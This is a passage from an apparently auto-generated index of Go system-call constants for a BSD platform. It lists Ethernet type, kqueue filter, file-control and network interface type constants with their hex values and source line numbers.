358) | ETHERTYPE_DIDDLE = 0x4321 constant ETHERTYPE_DLOG1 (line 359) | ETHERTYPE_DLOG1 = 0x660 constant ETHERTYPE_DLOG2 (line 360) | ETHERTYPE_DLOG2 = 0x661 constant ETHERTYPE_DN (line 361) | ETHERTYPE_DN = 0x6003 constant ETHERTYPE_DOGFIGHT (line 362) | ETHERTYPE_DOGFIGHT = 0x1989 constant ETHERTYPE_DSMD (line 363) | ETHERTYPE_DSMD = 0x8039 constant ETHERTYPE_EAPOL (line 364) | ETHERTYPE_EAPOL = 0x888e constant ETHERTYPE_ECMA (line 365) | ETHERTYPE_ECMA = 0x803 constant ETHERTYPE_ENCRYPT (line 366) | ETHERTYPE_ENCRYPT = 0x803d constant ETHERTYPE_ES (line 367) | ETHERTYPE_ES = 0x805d constant ETHERTYPE_EXCELAN (line 368) | ETHERTYPE_EXCELAN = 0x8010 constant ETHERTYPE_EXPERDATA (line 369) | ETHERTYPE_EXPERDATA = 0x8049 constant ETHERTYPE_FLIP (line 370) | ETHERTYPE_FLIP = 0x8146 constant ETHERTYPE_FLOWCONTROL (line 371) | ETHERTYPE_FLOWCONTROL = 0x8808 constant ETHERTYPE_FRARP (line 372) | ETHERTYPE_FRARP = 0x808 constant ETHERTYPE_GENDYN (line 373) | ETHERTYPE_GENDYN = 0x8068 constant ETHERTYPE_HAYES (line 374) | ETHERTYPE_HAYES = 0x8130 constant ETHERTYPE_HIPPI_FP (line 375) | ETHERTYPE_HIPPI_FP = 0x8180 constant ETHERTYPE_HITACHI (line 376) | ETHERTYPE_HITACHI = 0x8820 constant ETHERTYPE_HP (line 377) | ETHERTYPE_HP = 0x8005 constant ETHERTYPE_IEEEPUP (line 378) | ETHERTYPE_IEEEPUP = 0xa00 constant ETHERTYPE_IEEEPUPAT (line 379) | ETHERTYPE_IEEEPUPAT = 0xa01 constant ETHERTYPE_IMLBL (line 380) | ETHERTYPE_IMLBL = 0x4c42 constant ETHERTYPE_IMLBLDIAG (line 381) | ETHERTYPE_IMLBLDIAG = 0x424c constant ETHERTYPE_IP (line 382) | ETHERTYPE_IP = 0x800 constant ETHERTYPE_IPAS (line 383) | ETHERTYPE_IPAS = 0x876c constant ETHERTYPE_IPV6 (line 384) | ETHERTYPE_IPV6 = 0x86dd constant ETHERTYPE_IPX (line 385) | ETHERTYPE_IPX = 0x8137 constant ETHERTYPE_IPXNEW (line 386) | ETHERTYPE_IPXNEW = 0x8037 constant ETHERTYPE_KALPANA (line 387) | ETHERTYPE_KALPANA = 0x8582 constant ETHERTYPE_LANBRIDGE (line 388) | ETHERTYPE_LANBRIDGE = 0x8038 constant ETHERTYPE_LANPROBE (line 389) | ETHERTYPE_LANPROBE = 0x8888 constant ETHERTYPE_LAT (line 390) | ETHERTYPE_LAT = 0x6004 constant ETHERTYPE_LBACK (line 391) | ETHERTYPE_LBACK = 0x9000 constant ETHERTYPE_LITTLE (line 392) | ETHERTYPE_LITTLE = 0x8060 constant ETHERTYPE_LLDP (line 393) | ETHERTYPE_LLDP = 0x88cc constant ETHERTYPE_LOGICRAFT (line 394) | ETHERTYPE_LOGICRAFT = 0x8148 constant ETHERTYPE_LOOPBACK (line 395) | ETHERTYPE_LOOPBACK = 0x9000 constant ETHERTYPE_MACSEC (line 396) | ETHERTYPE_MACSEC = 0x88e5 constant ETHERTYPE_MATRA (line 397) | ETHERTYPE_MATRA = 0x807a constant ETHERTYPE_MAX (line 398) | ETHERTYPE_MAX = 0xffff constant ETHERTYPE_MERIT (line 399) | ETHERTYPE_MERIT = 0x807c constant ETHERTYPE_MICP (line 400) | ETHERTYPE_MICP = 0x873a constant ETHERTYPE_MOPDL (line 401) | ETHERTYPE_MOPDL = 0x6001 constant ETHERTYPE_MOPRC (line 402) | ETHERTYPE_MOPRC = 0x6002 constant ETHERTYPE_MOTOROLA (line 403) | ETHERTYPE_MOTOROLA = 0x818d constant ETHERTYPE_MPLS (line 404) | ETHERTYPE_MPLS = 0x8847 constant ETHERTYPE_MPLS_MCAST (line 405) | ETHERTYPE_MPLS_MCAST = 0x8848 constant ETHERTYPE_MUMPS (line 406) | ETHERTYPE_MUMPS = 0x813f constant ETHERTYPE_NBPCC (line 407) | ETHERTYPE_NBPCC = 0x3c04 constant ETHERTYPE_NBPCLAIM (line 408) | ETHERTYPE_NBPCLAIM = 0x3c09 constant ETHERTYPE_NBPCLREQ (line 409) | ETHERTYPE_NBPCLREQ = 0x3c05 constant ETHERTYPE_NBPCLRSP (line 410) | ETHERTYPE_NBPCLRSP = 0x3c06 constant ETHERTYPE_NBPCREQ (line 411) | ETHERTYPE_NBPCREQ = 0x3c02 constant ETHERTYPE_NBPCRSP (line 412) | ETHERTYPE_NBPCRSP = 0x3c03 constant ETHERTYPE_NBPDG (line 413) | ETHERTYPE_NBPDG = 0x3c07 constant ETHERTYPE_NBPDGB (line 414) | ETHERTYPE_NBPDGB = 0x3c08 constant ETHERTYPE_NBPDLTE (line 415) | ETHERTYPE_NBPDLTE = 0x3c0a constant ETHERTYPE_NBPRAR (line 416) | ETHERTYPE_NBPRAR = 0x3c0c constant ETHERTYPE_NBPRAS (line 417) | ETHERTYPE_NBPRAS = 0x3c0b constant ETHERTYPE_NBPRST (line 418) | ETHERTYPE_NBPRST = 0x3c0d constant ETHERTYPE_NBPSCD (line 419) | ETHERTYPE_NBPSCD = 0x3c01 constant ETHERTYPE_NBPVCD (line 420) | ETHERTYPE_NBPVCD = 0x3c00 constant ETHERTYPE_NBS (line 421) | ETHERTYPE_NBS = 0x802 constant ETHERTYPE_NCD (line 422) | ETHERTYPE_NCD = 0x8149 constant ETHERTYPE_NESTAR (line 423) | ETHERTYPE_NESTAR = 0x8006 constant ETHERTYPE_NETBEUI (line 424) | ETHERTYPE_NETBEUI = 0x8191 constant ETHERTYPE_NHRP (line 425) | ETHERTYPE_NHRP = 0x2001 constant ETHERTYPE_NOVELL (line 426) | ETHERTYPE_NOVELL = 0x8138 constant ETHERTYPE_NS (line 427) | ETHERTYPE_NS = 0x600 constant ETHERTYPE_NSAT (line 428) | ETHERTYPE_NSAT = 0x601 constant ETHERTYPE_NSCOMPAT (line 429) | ETHERTYPE_NSCOMPAT = 0x807 constant ETHERTYPE_NSH (line 430) | ETHERTYPE_NSH = 0x984f constant ETHERTYPE_NTRAILER (line 431) | ETHERTYPE_NTRAILER = 0x10 constant ETHERTYPE_OS9 (line 432) | ETHERTYPE_OS9 = 0x7007 constant ETHERTYPE_OS9NET (line 433) | ETHERTYPE_OS9NET = 0x7009 constant ETHERTYPE_PACER (line 434) | ETHERTYPE_PACER = 0x80c6 constant ETHERTYPE_PBB (line 435) | ETHERTYPE_PBB = 0x88e7 constant ETHERTYPE_PCS (line 436) | ETHERTYPE_PCS = 0x4242 constant ETHERTYPE_PLANNING (line 437) | ETHERTYPE_PLANNING = 0x8044 constant ETHERTYPE_PPP (line 438) | ETHERTYPE_PPP = 0x880b constant ETHERTYPE_PPPOE (line 439) | ETHERTYPE_PPPOE = 0x8864 constant ETHERTYPE_PPPOEDISC (line 440) | ETHERTYPE_PPPOEDISC = 0x8863 constant ETHERTYPE_PRIMENTS (line 441) | ETHERTYPE_PRIMENTS = 0x7031 constant ETHERTYPE_PUP (line 442) | ETHERTYPE_PUP = 0x200 constant ETHERTYPE_PUPAT (line 443) | ETHERTYPE_PUPAT = 0x200 constant ETHERTYPE_QINQ (line 444) | ETHERTYPE_QINQ = 0x88a8 constant ETHERTYPE_RACAL (line 445) | ETHERTYPE_RACAL = 0x7030 constant ETHERTYPE_RATIONAL (line 446) | ETHERTYPE_RATIONAL = 0x8150 constant ETHERTYPE_RAWFR (line 447) | ETHERTYPE_RAWFR = 0x6559 constant ETHERTYPE_RCL (line 448) | ETHERTYPE_RCL = 0x1995 constant ETHERTYPE_RDP (line 449) | ETHERTYPE_RDP = 0x8739 constant ETHERTYPE_RETIX (line 450) | ETHERTYPE_RETIX = 0x80f2 constant ETHERTYPE_REVARP (line 451) | ETHERTYPE_REVARP = 0x8035 constant ETHERTYPE_SCA (line 452) | ETHERTYPE_SCA = 0x6007 constant ETHERTYPE_SECTRA (line 453) | ETHERTYPE_SECTRA = 0x86db constant ETHERTYPE_SECUREDATA (line 454) | ETHERTYPE_SECUREDATA = 0x876d constant ETHERTYPE_SGITW (line 455) | ETHERTYPE_SGITW = 0x817e constant ETHERTYPE_SG_BOUNCE (line 456) | ETHERTYPE_SG_BOUNCE = 0x8016 constant ETHERTYPE_SG_DIAG (line 457) | ETHERTYPE_SG_DIAG = 0x8013 constant ETHERTYPE_SG_NETGAMES (line 458) | ETHERTYPE_SG_NETGAMES = 0x8014 constant ETHERTYPE_SG_RESV (line 459) | ETHERTYPE_SG_RESV = 0x8015 constant ETHERTYPE_SIMNET (line 460) | ETHERTYPE_SIMNET = 0x5208 constant ETHERTYPE_SLOW (line 461) | ETHERTYPE_SLOW = 0x8809 constant ETHERTYPE_SNA (line 462) | ETHERTYPE_SNA = 0x80d5 constant ETHERTYPE_SNMP (line 463) | ETHERTYPE_SNMP = 0x814c constant ETHERTYPE_SONIX (line 464) | ETHERTYPE_SONIX = 0xfaf5 constant ETHERTYPE_SPIDER (line 465) | ETHERTYPE_SPIDER = 0x809f constant ETHERTYPE_SPRITE (line 466) | ETHERTYPE_SPRITE = 0x500 constant ETHERTYPE_STP (line 467) | ETHERTYPE_STP = 0x8181 constant ETHERTYPE_TALARIS (line 468) | ETHERTYPE_TALARIS = 0x812b constant ETHERTYPE_TALARISMC (line 469) | ETHERTYPE_TALARISMC = 0x852b constant ETHERTYPE_TCPCOMP (line 470) | ETHERTYPE_TCPCOMP = 0x876b constant ETHERTYPE_TCPSM (line 471) | ETHERTYPE_TCPSM = 0x9002 constant ETHERTYPE_TEC (line 472) | ETHERTYPE_TEC = 0x814f constant ETHERTYPE_TIGAN (line 473) | ETHERTYPE_TIGAN = 0x802f constant ETHERTYPE_TRAIL (line 474) | ETHERTYPE_TRAIL = 0x1000 constant ETHERTYPE_TRANSETHER (line 475) | ETHERTYPE_TRANSETHER = 0x6558 constant ETHERTYPE_TYMSHARE (line 476) | ETHERTYPE_TYMSHARE = 0x802e constant ETHERTYPE_UBBST (line 477) | ETHERTYPE_UBBST = 0x7005 constant ETHERTYPE_UBDEBUG (line 478) | ETHERTYPE_UBDEBUG = 0x900 constant ETHERTYPE_UBDIAGLOOP (line 479) | ETHERTYPE_UBDIAGLOOP = 0x7002 constant ETHERTYPE_UBDL (line 480) | ETHERTYPE_UBDL = 0x7000 constant ETHERTYPE_UBNIU (line 481) | ETHERTYPE_UBNIU = 0x7001 constant ETHERTYPE_UBNMC (line 482) | ETHERTYPE_UBNMC = 0x7003 constant ETHERTYPE_VALID (line 483) | ETHERTYPE_VALID = 0x1600 constant ETHERTYPE_VARIAN (line 484) | ETHERTYPE_VARIAN = 0x80dd constant ETHERTYPE_VAXELN (line 485) | ETHERTYPE_VAXELN = 0x803b constant ETHERTYPE_VEECO (line 486) | ETHERTYPE_VEECO = 0x8067 constant ETHERTYPE_VEXP (line 487) | ETHERTYPE_VEXP = 0x805b constant ETHERTYPE_VGLAB (line 488) | ETHERTYPE_VGLAB = 0x8131 constant ETHERTYPE_VINES (line 489) | ETHERTYPE_VINES = 0xbad constant ETHERTYPE_VINESECHO (line 490) | ETHERTYPE_VINESECHO = 0xbaf constant ETHERTYPE_VINESLOOP (line 491) | ETHERTYPE_VINESLOOP = 0xbae constant ETHERTYPE_VITAL (line 492) | ETHERTYPE_VITAL = 0xff00 constant ETHERTYPE_VLAN (line 493) | ETHERTYPE_VLAN = 0x8100 constant ETHERTYPE_VLTLMAN (line 494) | ETHERTYPE_VLTLMAN = 0x8080 constant ETHERTYPE_VPROD (line 495) | ETHERTYPE_VPROD = 0x805c constant ETHERTYPE_VURESERVED (line 496) | ETHERTYPE_VURESERVED = 0x8147 constant ETHERTYPE_WATERLOO (line 497) | ETHERTYPE_WATERLOO = 0x8130 constant ETHERTYPE_WELLFLEET (line 498) | ETHERTYPE_WELLFLEET = 0x8103 constant ETHERTYPE_X25 (line 499) | ETHERTYPE_X25 = 0x805 constant ETHERTYPE_X75 (line 500) | ETHERTYPE_X75 = 0x801 constant ETHERTYPE_XNSSM (line 501) | ETHERTYPE_XNSSM = 0x9001 constant ETHERTYPE_XTP (line 502) | ETHERTYPE_XTP = 0x817d constant ETHER_ADDR_LEN (line 503) | ETHER_ADDR_LEN = 0x6 constant ETHER_ALIGN (line 504) | ETHER_ALIGN = 0x2 constant ETHER_CRC_LEN (line 505) | ETHER_CRC_LEN = 0x4 constant ETHER_CRC_POLY_BE (line 506) | ETHER_CRC_POLY_BE = 0x4c11db6 constant ETHER_CRC_POLY_LE (line 507) | ETHER_CRC_POLY_LE = 0xedb88320 constant ETHER_HDR_LEN (line 508) | ETHER_HDR_LEN = 0xe constant ETHER_MAX_DIX_LEN (line 509) | ETHER_MAX_DIX_LEN = 0x600 constant ETHER_MAX_HARDMTU_LEN (line 510) | ETHER_MAX_HARDMTU_LEN = 0xff9b constant ETHER_MAX_LEN (line 511) | ETHER_MAX_LEN = 0x5ee constant ETHER_MIN_LEN (line 512) | ETHER_MIN_LEN = 0x40 constant ETHER_TYPE_LEN (line 513) | ETHER_TYPE_LEN = 0x2 constant ETHER_VLAN_ENCAP_LEN (line 514) | ETHER_VLAN_ENCAP_LEN = 0x4 constant EVFILT_AIO (line 515) | EVFILT_AIO = -0x3 constant EVFILT_DEVICE (line 516) | EVFILT_DEVICE = -0x8 constant EVFILT_EXCEPT (line 517) | EVFILT_EXCEPT = -0x9 constant EVFILT_PROC (line 518) | EVFILT_PROC = -0x5 constant EVFILT_READ (line 519) | EVFILT_READ = -0x1 constant EVFILT_SIGNAL (line 520) | EVFILT_SIGNAL = -0x6 constant EVFILT_SYSCOUNT (line 521) | EVFILT_SYSCOUNT = 0x9 constant EVFILT_TIMER (line 522) | EVFILT_TIMER = -0x7 constant EVFILT_VNODE (line 523) | EVFILT_VNODE = -0x4 constant EVFILT_WRITE (line 524) | EVFILT_WRITE = -0x2 constant EVL_ENCAPLEN (line 525) | EVL_ENCAPLEN = 0x4 constant EVL_PRIO_BITS (line 526) | EVL_PRIO_BITS = 0xd constant EVL_PRIO_MAX (line 527) | EVL_PRIO_MAX = 0x7 constant EVL_VLID_MASK (line 528) | EVL_VLID_MASK = 0xfff constant EVL_VLID_MAX (line 529) | EVL_VLID_MAX = 0xffe constant EVL_VLID_MIN (line 530) | EVL_VLID_MIN = 0x1 constant EVL_VLID_NULL (line 531) | EVL_VLID_NULL = 0x0 constant EV_ADD (line 532) | EV_ADD = 0x1 constant EV_CLEAR (line 533) | EV_CLEAR = 0x20 constant EV_DELETE (line 534) | EV_DELETE = 0x2 constant EV_DISABLE (line 535) | EV_DISABLE = 0x8 constant EV_DISPATCH (line 536) | EV_DISPATCH = 0x80 constant EV_ENABLE (line 537) | EV_ENABLE = 0x4 constant EV_EOF (line 538) | EV_EOF = 0x8000 constant EV_ERROR (line 539) | EV_ERROR = 0x4000 constant EV_FLAG1 (line 540) | EV_FLAG1 = 0x2000 constant EV_ONESHOT (line 541) | EV_ONESHOT = 0x10 constant EV_RECEIPT (line 542) | EV_RECEIPT = 0x40 constant EV_SYSFLAGS (line 543) | EV_SYSFLAGS = 0xf800 constant EXTA (line 544) | EXTA = 0x4b00 constant EXTB (line 545) | EXTB = 0x9600 constant EXTPROC (line 546) | EXTPROC = 0x800 constant FD_CLOEXEC (line 547) | FD_CLOEXEC = 0x1 constant FD_SETSIZE (line 548) | FD_SETSIZE = 0x400 constant FLUSHO (line 549) | FLUSHO = 0x800000 constant F_DUPFD (line 550) | F_DUPFD = 0x0 constant F_DUPFD_CLOEXEC (line 551) | F_DUPFD_CLOEXEC = 0xa constant F_GETFD (line 552) | F_GETFD = 0x1 constant F_GETFL (line 553) | F_GETFL = 0x3 constant F_GETLK (line 554) | F_GETLK = 0x7 constant F_GETOWN (line 555) | F_GETOWN = 0x5 constant F_ISATTY (line 556) | F_ISATTY = 0xb constant F_OK (line 557) | F_OK = 0x0 constant F_RDLCK (line 558) | F_RDLCK = 0x1 constant F_SETFD (line 559) | F_SETFD = 0x2 constant F_SETFL (line 560) | F_SETFL = 0x4 constant F_SETLK (line 561) | F_SETLK = 0x8 constant F_SETLKW (line 562) | F_SETLKW = 0x9 constant F_SETOWN (line 563) | F_SETOWN = 0x6 constant F_UNLCK (line 564) | F_UNLCK = 0x2 constant F_WRLCK (line 565) | F_WRLCK = 0x3 constant HUPCL (line 566) | HUPCL = 0x4000 constant HW_MACHINE (line 567) | HW_MACHINE = 0x1 constant ICANON (line 568) | ICANON = 0x100 constant ICMP6_FILTER (line 569) | ICMP6_FILTER = 0x12 constant ICRNL (line 570) | ICRNL = 0x100 constant IEXTEN (line 571) | IEXTEN = 0x400 constant IFAN_ARRIVAL (line 572) | IFAN_ARRIVAL = 0x0 constant IFAN_DEPARTURE (line 573) | IFAN_DEPARTURE = 0x1 constant IFF_ALLMULTI (line 574) | IFF_ALLMULTI = 0x200 constant IFF_BROADCAST (line 575) | IFF_BROADCAST = 0x2 constant IFF_CANTCHANGE (line 576) | IFF_CANTCHANGE = 0x8e52 constant IFF_DEBUG (line 577) | IFF_DEBUG = 0x4 constant IFF_LINK0 (line 578) | IFF_LINK0 = 0x1000 constant IFF_LINK1 (line 579) | IFF_LINK1 = 0x2000 constant IFF_LINK2 (line 580) | IFF_LINK2 = 0x4000 constant IFF_LOOPBACK (line 581) | IFF_LOOPBACK = 0x8 constant IFF_MULTICAST (line 582) | IFF_MULTICAST = 0x8000 constant IFF_NOARP (line 583) | IFF_NOARP = 0x80 constant IFF_OACTIVE (line 584) | IFF_OACTIVE = 0x400 constant IFF_POINTOPOINT (line 585) | IFF_POINTOPOINT = 0x10 constant IFF_PROMISC (line 586) | IFF_PROMISC = 0x100 constant IFF_RUNNING (line 587) | IFF_RUNNING = 0x40 constant IFF_SIMPLEX (line 588) | IFF_SIMPLEX = 0x800 constant IFF_STATICARP (line 589) | IFF_STATICARP = 0x20 constant IFF_UP (line 590) | IFF_UP = 0x1 constant IFNAMSIZ (line 591) | IFNAMSIZ = 0x10 constant IFT_1822 (line 592) | IFT_1822 = 0x2 constant IFT_A12MPPSWITCH (line 593) | IFT_A12MPPSWITCH = 0x82 constant IFT_AAL2 (line 594) | IFT_AAL2 = 0xbb constant IFT_AAL5 (line 595) | IFT_AAL5 = 0x31 constant IFT_ADSL (line 596) | IFT_ADSL = 0x5e constant IFT_AFLANE8023 (line 597) | IFT_AFLANE8023 = 0x3b constant IFT_AFLANE8025 (line 598) | IFT_AFLANE8025 = 0x3c constant IFT_ARAP (line 599) | IFT_ARAP = 0x58 constant IFT_ARCNET (line 600) | IFT_ARCNET = 0x23 constant IFT_ARCNETPLUS (line 601) | IFT_ARCNETPLUS = 0x24 constant IFT_ASYNC (line 602) | IFT_ASYNC = 0x54 constant IFT_ATM (line 603) | IFT_ATM = 0x25 constant IFT_ATMDXI (line 604) | IFT_ATMDXI = 0x69 constant IFT_ATMFUNI (line 605) | IFT_ATMFUNI = 0x6a constant IFT_ATMIMA (line 606) | IFT_ATMIMA = 0x6b constant IFT_ATMLOGICAL (line 607) | IFT_ATMLOGICAL = 0x50 constant IFT_ATMRADIO (line 608) | IFT_ATMRADIO = 0xbd constant IFT_ATMSUBINTERFACE (line 609) | IFT_ATMSUBINTERFACE = 0x86 constant IFT_ATMVCIENDPT (line 610) | IFT_ATMVCIENDPT = 0xc2 constant IFT_ATMVIRTUAL (line 611) | IFT_ATMVIRTUAL = 0x95 constant IFT_BGPPOLICYACCOUNTING (line 612) | IFT_BGPPOLICYACCOUNTING = 0xa2 constant IFT_BLUETOOTH (line 613) | IFT_BLUETOOTH = 0xf8 constant IFT_BRIDGE (line 614) | IFT_BRIDGE = 0xd1 constant IFT_BSC (line 615) | IFT_BSC = 0x53 constant IFT_CARP (line 616) | IFT_CARP = 0xf7 constant IFT_CCTEMUL (line 617) | IFT_CCTEMUL = 0x3d constant IFT_CEPT (line 618) | IFT_CEPT = 0x13 constant IFT_CES (line 619) | IFT_CES = 0x85 constant IFT_CHANNEL (line 620) | IFT_CHANNEL = 0x46 constant IFT_CNR (line 621) | IFT_CNR = 0x55 constant IFT_COFFEE (line 622) | IFT_COFFEE = 0x84 constant IFT_COMPOSITELINK (line 623) | IFT_COMPOSITELINK = 0x9b constant IFT_DCN (line 624) | IFT_DCN = 0x8d constant IFT_DIGITALPOWERLINE (line 625) | IFT_DIGITALPOWERLINE = 0x8a constant IFT_DIGITALWRAPPEROVERHEADCHANNEL (line 626) | IFT_DIGITALWRAPPEROVERHEADCHANNEL = 0xba constant IFT_DLSW (line 627) | IFT_DLSW = 0x4a constant IFT_DOCSCABLEDOWNSTREAM (line 628) | IFT_DOCSCABLEDOWNSTREAM = 0x80 constant IFT_DOCSCABLEMACLAYER (line 629) | IFT_DOCSCABLEMACLAYER = 0x7f constant IFT_DOCSCABLEUPSTREAM (line 630) | IFT_DOCSCABLEUPSTREAM = 0x81 constant IFT_DOCSCABLEUPSTREAMCHANNEL (line 631) | IFT_DOCSCABLEUPSTREAMCHANNEL = 0xcd constant IFT_DS0 (line 632) | IFT_DS0 = 0x51 constant IFT_DS0BUNDLE (line 633) | IFT_DS0BUNDLE = 0x52 constant IFT_DS1FDL (line 634) | IFT_DS1FDL = 0xaa constant IFT_DS3 (line 635) | IFT_DS3 = 0x1e constant IFT_DTM (line 636) | IFT_DTM = 0x8c constant IFT_DUMMY (line 637) | IFT_DUMMY = 0xf1 constant IFT_DVBASILN (line 638) | IFT_DVBASILN = 0xac constant IFT_DVBASIOUT (line 639) | IFT_DVBASIOUT = 0xad constant IFT_DVBRCCDOWNSTREAM (line 640) | IFT_DVBRCCDOWNSTREAM = 0x93 constant IFT_DVBRCCMACLAYER (line 641) | IFT_DVBRCCMACLAYER = 0x92 constant IFT_DVBRCCUPSTREAM (line 642) | IFT_DVBRCCUPSTREAM = 0x94 constant IFT_ECONET (line 643) | IFT_ECONET = 0xce constant IFT_ENC (line 644) | IFT_ENC = 0xf4 constant IFT_EON (line 645) | IFT_EON = 0x19 constant IFT_EPLRS (line 646) | IFT_EPLRS = 0x57 constant IFT_ESCON (line 647) | IFT_ESCON = 0x49 constant IFT_ETHER (line 648) | IFT_ETHER = 0x6 constant IFT_FAITH (line 649) | IFT_FAITH = 0xf3 constant IFT_FAST (line 650) | IFT_FAST = 0x7d constant IFT_FASTETHER (line 651) | IFT_FASTETHER = 0x3e constant IFT_FASTETHERFX (line 652) | IFT_FASTETHERFX = 0x45 constant IFT_FDDI (line 653) | IFT_FDDI = 0xf constant IFT_FIBRECHANNEL (line 654) | IFT_FIBRECHANNEL = 0x38 constant IFT_FRAMERELAYINTERCONNECT (line 655) | IFT_FRAMERELAYINTERCONNECT = 0x3a constant IFT_FRAMERELAYMPI (line 656) | IFT_FRAMERELAYMPI = 0x5c constant IFT_FRDLCIENDPT (line 657) | IFT_FRDLCIENDPT = 0xc1 constant IFT_FRELAY (line 658) | IFT_FRELAY = 0x20 constant IFT_FRELAYDCE (line 659) | IFT_FRELAYDCE = 0x2c constant IFT_FRF16MFRBUNDLE (line 660) | IFT_FRF16MFRBUNDLE = 0xa3 constant IFT_FRFORWARD (line 661) | IFT_FRFORWARD = 0x9e constant IFT_G703AT2MB (line 662) | IFT_G703AT2MB = 0x43 constant IFT_G703AT64K (line 663) | IFT_G703AT64K = 0x42 constant IFT_GIF (line 664) | IFT_GIF = 0xf0 constant IFT_GIGABITETHERNET (line 665) | IFT_GIGABITETHERNET = 0x75 constant IFT_GR303IDT (line 666) | IFT_GR303IDT = 0xb2 constant IFT_GR303RDT (line 667) | IFT_GR303RDT = 0xb1 constant IFT_H323GATEKEEPER (line 668) | IFT_H323GATEKEEPER = 0xa4 constant IFT_H323PROXY (line 669) | IFT_H323PROXY = 0xa5 constant IFT_HDH1822 (line 670) | IFT_HDH1822 = 0x3 constant IFT_HDLC (line 671) | IFT_HDLC = 0x76 constant IFT_HDSL2 (line 672) | IFT_HDSL2 = 0xa8 constant IFT_HIPERLAN2 (line 673) | IFT_HIPERLAN2 = 0xb7 constant IFT_HIPPI (line 674) | IFT_HIPPI = 0x2f constant IFT_HIPPIINTERFACE (line 675) | IFT_HIPPIINTERFACE = 0x39 constant IFT_HOSTPAD (line 676) | IFT_HOSTPAD = 0x5a constant IFT_HSSI (line 677) | IFT_HSSI = 0x2e constant IFT_HY (line 678) | IFT_HY = 0xe constant IFT_IBM370PARCHAN (line 679) | IFT_IBM370PARCHAN = 0x48 constant IFT_IDSL (line 680) | IFT_IDSL = 0x9a constant IFT_IEEE1394 (line 681) | IFT_IEEE1394 = 0x90 constant IFT_IEEE80211 (line 682) | IFT_IEEE80211 = 0x47 constant IFT_IEEE80212 (line 683) | IFT_IEEE80212 = 0x37 constant IFT_IEEE8023ADLAG (line 684) | IFT_IEEE8023ADLAG = 0xa1 constant IFT_IFGSN (line 685) | IFT_IFGSN = 0x91 constant IFT_IMT (line 686) | IFT_IMT = 0xbe constant IFT_INFINIBAND (line 687) | IFT_INFINIBAND = 0xc7 constant IFT_INTERLEAVE (line 688) | IFT_INTERLEAVE = 0x7c constant IFT_IP (line 689) | IFT_IP = 0x7e constant IFT_IPFORWARD (line 690) | IFT_IPFORWARD = 0x8e constant IFT_IPOVERATM (line 691) | IFT_IPOVERATM = 0x72 constant IFT_IPOVERCDLC (line 692) | IFT_IPOVERCDLC = 0x6d constant IFT_IPOVERCLAW (line 693) | IFT_IPOVERCLAW = 0x6e constant IFT_IPSWITCH (line 694) | IFT_IPSWITCH = 0x4e constant IFT_ISDN (line 695) | IFT_ISDN = 0x3f constant IFT_ISDNBASIC (line 696) | IFT_ISDNBASIC = 0x14 constant IFT_ISDNPRIMARY (line 697) | IFT_ISDNPRIMARY = 0x15 constant IFT_ISDNS (line 698) | IFT_ISDNS = 0x4b constant IFT_ISDNU (line 699) | IFT_ISDNU = 0x4c constant IFT_ISO88022LLC (line 700) | IFT_ISO88022LLC = 0x29 constant IFT_ISO88023 (line 701) | IFT_ISO88023 = 0x7 constant IFT_ISO88024 (line 702) | IFT_ISO88024 = 0x8 constant IFT_ISO88025 (line 703) | IFT_ISO88025 = 0x9 constant IFT_ISO88025CRFPINT (line 704) | IFT_ISO88025CRFPINT = 0x62 constant IFT_ISO88025DTR (line 705) | IFT_ISO88025DTR = 0x56 constant IFT_ISO88025FIBER (line 706) | IFT_ISO88025FIBER = 0x73 constant IFT_ISO88026 (line 707) | IFT_ISO88026 = 0xa constant IFT_ISUP (line 708) | IFT_ISUP = 0xb3 constant IFT_L2VLAN (line 709) | IFT_L2VLAN = 0x87 constant IFT_L3IPVLAN (line 710) | IFT_L3IPVLAN = 0x88 constant IFT_L3IPXVLAN (line 711) | IFT_L3IPXVLAN = 0x89 constant IFT_LAPB (line 712) | IFT_LAPB = 0x10 constant IFT_LAPD (line 713) | IFT_LAPD = 0x4d constant IFT_LAPF (line 714) | IFT_LAPF = 0x77 constant IFT_LINEGROUP (line 715) | IFT_LINEGROUP = 0xd2 constant IFT_LOCALTALK (line 716) | IFT_LOCALTALK = 0x2a constant IFT_LOOP (line 717) | IFT_LOOP = 0x18 constant IFT_MBIM (line 718) | IFT_MBIM = 0xfa constant IFT_MEDIAMAILOVERIP (line 719) | IFT_MEDIAMAILOVERIP = 0x8b constant IFT_MFSIGLINK (line 720) | IFT_MFSIGLINK = 0xa7 constant IFT_MIOX25 (line 721) | IFT_MIOX25 = 0x26 constant IFT_MODEM (line 722) | IFT_MODEM = 0x30 constant IFT_MPC (line 723) | IFT_MPC = 0x71 constant IFT_MPLS (line 724) | IFT_MPLS = 0xa6 constant IFT_MPLSTUNNEL (line 725) | IFT_MPLSTUNNEL = 0x96 constant IFT_MSDSL (line 726) | IFT_MSDSL = 0x8f constant IFT_MVL (line 727) | IFT_MVL = 0xbf constant IFT_MYRINET (line 728) | IFT_MYRINET = 0x63 constant IFT_NFAS (line 729) | IFT_NFAS = 0xaf constant IFT_NSIP (line 730) | IFT_NSIP = 0x1b constant IFT_OPTICALCHANNEL (line 731) | IFT_OPTICALCHANNEL = 0xc3 constant IFT_OPTICALTRANSPORT (line 732) | IFT_OPTICALTRANSPORT = 0xc4 constant IFT_OTHER (line 733) | IFT_OTHER = 0x1 constant IFT_P10 (line 734) | IFT_P10 = 0xc constant IFT_P80 (line 735) | IFT_P80 = 0xd constant IFT_PARA (line 736) | IFT_PARA = 0x22 constant IFT_PFLOG (line 737) | IFT_PFLOG = 0xf5 constant IFT_PFLOW (line 738) | IFT_PFLOW = 0xf9 constant IFT_PFSYNC (line 739) | IFT_PFSYNC = 0xf6 constant IFT_PLC (line 740) | IFT_PLC = 0xae constant IFT_PON155 (line 741) | IFT_PON155 = 0xcf constant IFT_PON622 (line 742) | IFT_PON622 = 0xd0 constant IFT_POS (line 743) | IFT_POS = 0xab constant IFT_PPP (line 744) | IFT_PPP = 0x17 constant IFT_PPPMULTILINKBUNDLE (line 745) | IFT_PPPMULTILINKBUNDLE = 0x6c constant IFT_PROPATM (line 746) | IFT_PROPATM = 0xc5 constant IFT_PROPBWAP2MP (line 747) | IFT_PROPBWAP2MP = 0xb8 constant IFT_PROPCNLS (line 748) | IFT_PROPCNLS = 0x59 constant IFT_PROPDOCSWIRELESSDOWNSTREAM (line 749) | IFT_PROPDOCSWIRELESSDOWNSTREAM = 0xb5 constant IFT_PROPDOCSWIRELESSMACLAYER (line 750) | IFT_PROPDOCSWIRELESSMACLAYER = 0xb4 constant IFT_PROPDOCSWIRELESSUPSTREAM (line 751) | IFT_PROPDOCSWIRELESSUPSTREAM = 0xb6 constant IFT_PROPMUX (line 752) | 